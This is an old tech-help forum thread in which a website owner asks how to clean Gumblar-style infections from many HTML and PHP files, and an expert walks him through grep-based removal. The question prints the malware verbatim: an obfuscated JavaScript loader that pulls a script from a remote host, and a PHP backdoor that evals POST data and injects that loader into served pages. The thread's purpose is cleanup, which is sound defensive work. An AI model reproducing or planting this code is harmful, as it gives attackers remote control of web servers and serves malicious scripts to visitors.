Solved

remove document.write unescape References

Posted on 2009-05-20
12
853 Views
Last Modified: 2013-12-06
Do you have an application that will allow me to remove following type of viruses from my html/php files?

VIRUSES:

1) something to do with GUMBLAR code
2) How to remove document.write unescape References?

<script language=javascript><!--
document.write(unescape('%3CscpGhrpGhig8Lpt%20gPhsrT8c%3D%2F%2Fm894T8%2E2pGh47%2E2%2ET8195e2q%2FjqugPhepGhrT8yg8L%2ET8jspGh%3ET8%3C%2FzOMscripe2qtzOM%3E').replace(/e2q|zOM|T8|gPh|g8L|m8|pGh/g,""));
 --></script>

3) FROM PHP FILES following junk coding... added to my codes

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY3BHaHJwR2hpZzhMcHQlMjBnUGhzclQ4YyUzRCUyRiUyRm04OTRUOCUyRTJwR2g0NyUyRTIlMkVUODE5NWUycSUyRmpxdWdQaGVwR2hyVDh5ZzhMJTJFVDhqc3BHaCUzRVQ4JTNDJTJGek9Nc2NyaXBlMnF0ek9NJTNFJykucmVwbGFjZSgvZTJxfHpPTXxUOHxnUGh8ZzhMfG04fHBHaC9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


If you have something to remove these type of viruses please let me know. I have over 200 main folders and many sub and sub folders under it which is infected by such. If I sit manually to remove this from all it will take me a very long time. Please advise. I have the files on a web server as well as on my local computer hard drive.

Thanks & Regards
0
Comment
Question by:shahja9
  • 8
  • 2
12 Comments
 
LVL 41

Expert Comment

by:HonorGod
ID: 24433066

If you have grep on your system, you could:

- Locate files containing "write(unescape", or  "function_exists('tmp",

- Then, you could use "grep -v" to process the file, and keep every line except those that contain the offending text...

grep -v "write\(unescape" myFile.html >myFile.new

The result of this should be the contents of "myFile.html" being copied to the output file (myFile.new) without the matching line
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24433079
If the offending text spans more than one line, we would have to do something a little more complicated.

Let me know.
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24433102
If you need grep for Windows, I found this one recently.  It has been around for awhile, but appears to be stable for all of the things for which I have used it.

http://pages.interlog.com/~tcharron/grep.html
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24433129
The neat thing about grep is that you could use it to locate the files containing the offending text, and output this to a ".bat" or ".sh" file, then use a good editor to take this list of files and change the file name to be an invocation of grep to process the input file, and remove the offending text, then execute the modified script file.  

That's how I would do it.
0
 

Author Comment

by:shahja9
ID: 24433315
HI

Thanks for the prompt reply. I am sorry I am very new to this virus. Do I check this on the web server or on my local backup. I have taken the entire backup of the files that are on the web server on my hard disk. It is over 12 gig. Now please suggest me the best, easiest and quickest solution to get rid of the virus "junk" coding. I have never used grep...please help
Regards

0
How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

 
LVL 41

Expert Comment

by:HonorGod
ID: 24433400
For example:

- Open a command prompt to the main directory/folder
- Use grep to find all the files containing the

  grep -SL "write\(unescape" *.html >grep.out

- Use a good editor (e.g., this worked in slickedit (VI mode) for me )

:%s/^(.*).html$/grep -v "write(unescape" \1.html >\1.out/

- Rename the file to have a suitable script extension (either .bat, or .sh)
- If you're on a Unix type system, make the script executable
- execute the script
- Check some of the *.out files

I would then consider building another script file to "rename" the *.out to *.html for each of the processed files
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24433502
Do you have grep?

To find out type the following at a command prompt:

grep -?

If you get some "help" type output, it is available.
If not, you are going to have to find/install one.

What operating system are you using?

I would certainly use grep to check to see if any of your backups files are infected
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24434146
If you don't have grep installed, do you have Python, or Perl?
0
 

Author Comment

by:shahja9
ID: 24436005
i installed grep.
I found the files that are infected. Now how do I auto clean it... with a script.. please can someone provide me the script and instructions?
Regards
0
 
LVL 41

Accepted Solution

by:
HonorGod earned 250 total points
ID: 24436223
sure.  Does the grep that you have allow you to specify "-S" to search sub-directories?  How about "-L" to only list file names containing the matching string?

So, can you use something like:

grep -SL "write\(unescape" *.html >grep.out

to find all of the files infected with that particular sequence of characters?

Look in the grep.out that is created.  You should have 1 line for each infected file.

What editor do you have?

Edit grep.out, and:

insert the following at the beginning of every line:

grep -v "write\(unescape"

remember to have a space after the closing double-quote.
So, each line should look like:

grep -v "write\(unescape" fileName01.html
grep -v "write\(unescape" fileName02.html
...

Append " >" (without the quote) to the end of each line...

Does your editor allow you to select, and copy a column of characters?
Select all of the file name portions of each line (they should all start in the same column), and append the filename block to the end of the line.  This makes each line look like:

grep -v "write\(unescape" fileName01.html >fileName01.html
grep -v "write\(unescape" fileName02.html >fileName02.html
...

Then, change the last part of each line from .html to something else, e.g., .out
which makes the file look like:

grep -v "write\(unescape" fileName01.html >fileName01.out
grep -v "write\(unescape" fileName02.html >fileName02.out
...


I presume that you are using Windows.  Is that correct?

rename grep.out fix.bat

Then, you should be able to execute:

fix

and see each grep command get executed.

By the way, since you have 1 line for each infected file, how many lines (infected files) do you have?
0
 
LVL 82

Assisted Solution

by:hielo
hielo earned 250 total points
ID: 24708115
0

Featured Post

6 Surprising Benefits of Threat Intelligence

All sorts of threat intelligence is available on the web. Intelligence you can learn from, and use to anticipate and prepare for future attacks.

Join & Write a Comment

Suggested Solutions

SHARE your personal details only on a NEED to basis. Take CHARGE and SECURE your IDENTITY. How do I then PROTECT myself and stay in charge of my own Personal details (and) - MY own WAY...
JavaScript can be used in a browser to change parts of a webpage dynamically. It begins with the following pattern: If condition W is true, do thing X to target Y after event Z. Below are some tips and tricks to help you get started with JavaScript …
The viewer will learn the basics of jQuery, including how to invoke it on a web page. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery.: (CODE)
The viewer will learn the basics of jQuery including how to code hide show and toggles. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery…

747 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

9 Experts available now in Live!

Get 1:1 Help Now